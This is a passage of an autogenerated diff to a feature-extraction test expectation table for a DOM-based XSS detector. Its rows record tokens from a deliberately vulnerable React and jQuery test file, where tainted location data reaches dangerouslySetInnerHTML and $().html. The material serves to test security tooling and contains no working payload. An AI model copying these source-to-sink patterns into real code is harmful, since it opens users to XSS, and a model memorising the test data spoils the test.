URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:32:218:40 | prevState | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:32:218:40 | prevState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:32:218:40 | prevState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:32:218:40 | prevState | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:218:32:218:49 | prevState.tainted4 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:218:32:218:49 | prevState.tainted4 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:218:32:218:49 | prevState.tainted4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16965,6 +117427,188 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:218:32:218:49 | prevState.tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:218:32:218:49 | prevState.tainted4 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:218:32:218:49 | prevState.tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:42:218:49 | tainted4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:42:218:49 | tainted4 | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:42:218:49 | tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:42:218:49 | tainted4 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:42:218:49 | tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | class C ... }\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | class C ... }\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | class C ... }\\n } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | class C ... }\\n } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:5:234:5 | class C ... }\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:11:223:12 | C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:11:223:12 | C2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:223:11:223:12 | C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:11:223:12 | C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:11:223:12 | C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:26 | React | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:26 | React | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:26 | React | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:26 | React | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:26 | React | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:36 | React.Component | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:36 | React.Component | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:36 | React.Component | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:36 | React.Component | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:22:223:36 | React.Component | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:28:223:36 | Component | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:28:223:36 | Component | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:223:28:223:36 | Component | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:28:223:36 | Component | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:28:223:36 | Component | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | 'arguments' object of default constructor of class C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | 'arguments' object of default constructor of class C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | 'arguments' object of default constructor of class C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | 'arguments' object of default constructor of class C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | 'arguments' object of default constructor of class C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | (...arg ... rgs); } | assignedToPropName | constructor | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | (...arg ... rgs); } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | (...arg ... rgs); } | contextSurroundingFunctionParameters | ()\n(args) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | (...arg ... rgs); } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | (...arg ... rgs); } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | (...arg ... rgs); } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | ...args | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | ...args | contextSurroundingFunctionParameters | ()\n(args) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | ...args | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | ...args | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | ...args | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | contextSurroundingFunctionParameters | ()\n(args) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | contextSurroundingFunctionParameters | ()\n(args) | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | args | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:223:38:223:37 | constru ... rgs); } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 